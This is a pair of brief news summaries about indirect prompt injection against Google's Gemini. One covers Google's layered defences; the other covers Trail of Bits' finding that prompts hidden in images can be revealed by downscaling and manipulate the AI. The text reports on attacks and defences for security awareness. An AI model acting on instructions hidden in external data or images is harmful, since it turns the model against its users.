Google is addressing the growing threat of indirect prompt injection attacks on generative AI systems, which involve hidden malicious instructions in external data sources. Their layered security strategy for the Gemini platform includes advanced content classifiers, security thought reinforcement, markdown sanitization, user confirmation mechanisms, and end-user security notifications to enhance protection against such attacks.
Security researchers at Trail of Bits have discovered that Google's Gemini tools are vulnerable to image-scaling prompt injection attacks, allowing malicious prompts to be embedded in images that can manipulate the AI's behavior. Google does not classify this as a security vulnerability due to its reliance on non-default configurations, but researchers warn that such attacks could exploit AI systems if not properly mitigated. They recommend avoiding image downscaling in agentic AI systems and implementing systematic defenses against prompt injection.